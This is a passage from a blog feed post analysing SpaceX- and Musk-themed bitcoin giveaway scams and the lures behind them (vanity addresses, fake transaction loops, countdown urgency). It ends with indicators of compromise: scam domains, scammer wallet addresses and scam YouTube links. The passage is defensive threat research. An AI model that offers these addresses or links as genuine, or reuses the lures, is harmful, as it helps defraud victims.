,file:///home/notorious/Documents/Publii/sites/sync_pundit/input/media/posts/2//responsive/unnamed-8-xl.png 1360w ,file:///home/notorious/Documents/Publii/sites/sync_pundit/input/media/posts/2//responsive/unnamed-8-2xl.png 1600w\"></figure><figure class=\"post__image\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/1/unnamed-8.png\" alt=\"\" width=\"960\" height=\"413\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/1/responsive/unnamed-8-xs.png 300w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-8-sm.png 480w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-8-md.png 768w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-8-lg.png 1024w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-8-xl.png 1360w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-8-2xl.png 1600w\"></figure>\n<h2><span style=\"font-weight: 400;\">Why did the scam work?</span><span style=\"font-weight: 400;\"> </span></h2>\n<h3><span style=\"font-weight: 400;\">News Cycle</span></h3>\n<p><span style=\"font-weight: 400;\">With SpaceX’s successful launch, the attackers were presented with a ripe opportunity to capitalise on the news. Since all eyes are on SpaceX, a SpaceX themed attack has thousands of potential victims waiting to take the bate. </span></p>\n<h3><span style=\"font-weight: 400;\">Vanity Address</span></h3>\n<p><span style=\"font-weight: 400;\">Some of the addresses used in the attacks used </span><span style=\"color: #3598db;\"><a href=\"https://news.bitcoin.com/how-to-generate-a-bitcoin-vanity-address/#:~:text=A%20bitcoin%20vanity%20address%20is,name%20of%20the%20wallet's%20owner.\" style=\"color: #3598db;\"><span style=\"font-weight: 400;\">vanity addresses</span></a></span><span style=\"font-weight: 400;\"> to create a sense of trust and legitimacy. Some of them are:</span></p>\n<ul>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">1Musk18ezNXyS1Am9WrYxdWbHnqNCPrAMb</span></li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">1EMuskPyw1irYmZrXfy26mgATarN1bfwp7</span></li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">1SpacexRRTziVHZqGzc6GzR76oQsZEc85</span></li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">1Musk1hzEwBMB9aqv2rQqkJ4GjSUFMLK9U</span></li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">1SpacexRRTziVHZqGzc6GzR76oQsZEc85</span></li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">1ELonMUSK14JSGNYAcPJNqubuFByZPyjcj</span></li>\n</ul>\n<p><span style=\"font-weight: 400;\">The “Musk”, “Spacex”. etc. at the beginning of the addresses boosted their trust and the victims took the bait. </span></p>\n<h3><span style=\"font-weight: 400;\">Attention to Detail</span></h3>\n<figure class=\"post__image\" ><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/1/unnamed-10.png\" alt=\"\" width=\"1505\" height=\"571\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/1/responsive/unnamed-10-xs.png 300w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-10-sm.png 480w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-10-md.png 768w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-10-lg.png 1024w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-10-xl.png 1360w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-10-2xl.png 1600w\">\n<figcaption ><span style=\"font-weight: 400;\">https://spacex-btc.net/#</span>Caption</figcaption>\n</figure>\n<p><span style=\"font-weight: 400;\">The attackers kept a live loop of fake transactions at the bottom of the page. They were meticulous enough to have the transaction out 2X greater than the transaction in. Giving the victims the impression that previous participants had gotten their rewards.</span></p>\n<h3><span style=\"font-weight: 400;\">Sense of Urgency</span></h3>\n<figure class=\"post__image\" ><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/1/unnamed-9.png\" alt=\"\" width=\"849\" height=\"194\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/1/responsive/unnamed-9-xs.png 300w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-9-sm.png 480w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-9-md.png 768w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-9-lg.png 1024w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-9-xl.png 1360w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-9-2xl.png 1600w\">\n<figcaption ><span style=\"font-weight: 400;\">https://spacex-btc.net/#</span>Caption</figcaption>\n</figure>\n<p><span style=\"font-weight: 400;\">The countdown bar showing supposedly how much bitcoin is left for the giveaway creates a sense of urgency, a useful tool for the attackers, the victims were prompted to act fast before the bitcoin ran out and hence acted without thinking it through.</span></p>\n<p><span style=\"font-weight: 400;\">At the time of writing, the total amount of money these attacks stole is well over $150K. It was predicted that these types of attackers </span><span style=\"color: #3598db;\"><a href=\"https://www.phishfort.com/blog/binance-free-giveaway-scam-analysis\" style=\"color: #3598db;\"><span style=\"font-weight: 400;\">will continue to increase in frequency</span></a></span><span style=\"font-weight: 400;\">. </span></p>\n<h2><span style=\"font-weight: 400;\">Protecting yourself online</span></h2>\n<p><span style=\"font-weight: 400;\">To learn how to protect yourself from scams like these read this blog post on </span><span style=\"color: #3598db;\"><a href=\"https://www.phishfort.com/blog/staying-safe-online\" style=\"color: #3598db;\"><span style=\"font-weight: 400;\">How to Spot Phishing Attacks</span></a></span><span style=\"font-weight: 400;\">.</span></p>\n<p><span style=\"color: #3598db;\"><a href=\"https://www.phishfort.com/protect\" style=\"color: #3598db;\"><span style=\"font-weight: 400;\">PhishFort Protect Browser Extension</span></a></span></p>\n<h2><span style=\"font-weight: 400;\">Indicators of Compromise</span></h2>\n<h3><span style=\"font-weight: 400;\">Domains</span></h3>\n<p><span style=\"font-weight: 400;\">spacex-tesla[.]me</span></p>\n<p><span style=\"font-weight: 400;\">spacex[.]money</span></p>\n<p><span style=\"font-weight: 400;\">spacex-btc[.]net</span></p>\n<p><span style=\"font-weight: 400;\">spacex-btc[.]infoSpacex-btc[.]com</span></p>\n<p><span style=\"font-weight: 400;\">spacex-btc[.]live</span></p>\n<p><span style=\"font-weight: 400;\">spaceufx[.]site</span></p>\n<p><span style=\"font-weight: 400;\">btcspacex[.]com</span></p>\n<p><span style=\"font-weight: 400;\">officialelonmusk[.]com</span></p>\n<p><span style=\"font-weight: 400;\">elonmusckbtc[.]com</span></p>\n<p><span style=\"font-weight: 400;\">teslagain[.]com</span></p>\n<p><span style=\"font-weight: 400;\">spacexbitcoins[.]com</span></p>\n<p><span style=\"font-weight: 400;\">spacexdrop[.]info</span></p>\n<p><span style=\"font-weight: 400;\">tesla-giveaway[.]getforge[.]io</span></p>\n<p><span style=\"font-weight: 400;\">spacetesla[.]info</span></p>\n<p><span style=\"font-weight: 400;\">teslagives[.]info</span></p>\n<p><span style=\"font-weight: 400;\">bonustesla[.]com</span></p>\n<p><span style=\"font-weight: 400;\">teslaearn[.]com</span></p>\n<p><span style=\"font-weight: 400;\">teslabtc[.]live</span></p>\n<h3><span style=\"font-weight: 400;\">Bitcoin Addresses</span></h3>\n<p><span style=\"font-weight: 400;\">1SpacexRRTziVHZqGzc6GzR76oQsZEc85</span></p>\n<p><span style=\"font-weight: 400;\">1Musk1hzEwBMB9aqv2rQqkJ4GjSUFMLK9U</span></p>\n<p><span style=\"font-weight: 400;\">18PBHxS9q62KpKUrxu6Ss7AKjUn1W11PRc</span></p>\n<p><span style=\"font-weight: 400;\">1SpacexRRTziVHZqGzc6GzR76oQsZEc85</span></p>\n<p><span style=\"font-weight: 400;\">1ELonMUSK14JSGNYAcPJNqubuFByZPyjcj</span></p>\n<p><span style=\"font-weight: 400;\">1GwMM8uSPgX15Z58bVu5AdoFK9HE3rfaVL</span></p>\n<p><span style=\"font-weight: 400;\">18W11awT6UHMgnAMCqTtrcj2GYV662HY5V</span></p>\n<p><span style=\"font-weight: 400;\">1B2U5swpSH6hmboFWrbfwZK1c84horiJeT</span></p>\n<p><span style=\"font-weight: 400;\">12wV4uEvFcVZgKbH34vQgfU6Gh2rt6XyRt</span></p>\n<p><span style=\"font-weight: 400;\">18W11awT6UHMgnAMCqTtrcj2GYV662HY5V</span></p>\n<p><span style=\"font-weight: 400;\">15mt8E5RTGHuhYtJAg12HkccTxnVBTxqpM</span></p>\n<p><span style=\"font-weight: 400;\">1TESLAYDMZUGQuxFNWP8nkwvSj7p1juHh</span></p>\n<h3><span style=\"font-weight: 400;\">YouTube channels</span></h3>\n<p><span style=\"color: #3598db;\"><a href=\"https://www.youtube.com/watch?v=vXVs-o3darI\" style=\"color: #3598db;\"><span style=\"font-weight: 400;\">Interview with Elon Musk (Exclusive Interview)</span></a></span></p>\n<p><span style=\"color: #3598db;\"><a href=\"https://www.youtube.com/watch?v=xTnxLw3p9Mw\" style=\"color: #3598db;\"><span style=\"font-weight: 400;\">🔷Elon Musk Live/ Bitcoin BTC Talk BTC Mass Adoption & SpaceX update [4 May, 20</span></a></span></p>\n<p><span style=\"color: #3598db;\"><a href=\"https://www.youtube.com/watch?v=r-zgh2bP--k\" style=\"color: #3598db;\"><span style=\"font-weight: 400;\">🔷Elon Musk Live/ Bitcoin BTC Talk BTC Mass Adoption & SpaceX update [4 May, 20</span></a></span></p>\n<p><span style=\"color: #3598db;\"><a href=\"https://www.youtube.com/watch?v=TmRKPVOM7XI\" style=\"color: #3598db;\"><span style=\"font-weight: 400;\">Elon Musk Live: Bitcoin Talk & SpaceX update [May, 2020]</span></a></span></p>\n<p><span style=\"color: #3598db;\"><a href=\"https://www.youtube.com/watch?v=8hSl4kgO5o4\" style=\"color: #3598db;\"><span style=\"font-weight: 400;\">Elon Musk Interview (Special)</span></a></span></p>\n<p><span style=\"color: #3598db;\"><a href=\"https://www.youtube.com/watch?v=1657gqaL4GY\" style=\"color: #3598db;\"><span style=\"font-weight: 400;\">Elon Musk Interview: Exclusive</span></a></span></p>\n<p><span style=\"color: #3598db;\"><a href=\"https://www.youtube.com/watch?v=mPoL3JIkwBw\" style=\"color: #3598db;\"><span style=\"font-weight: 400;\">Elon Musk Officially Confirms BTC Giveaway (Check Description)</span></a></span></p>\n<p> </p>",
"image": "https://blog.syncpundit.io/media/posts/1/unnamed-2-2.png",
"author": {
"name": "Sync_Pundit"
},
"tags": [
"Research"
],
"date_published": "2020-06-15T07:28:00+02:00",
"date_modified": "2021-09-20T20:02:34+02:00"
}
]
}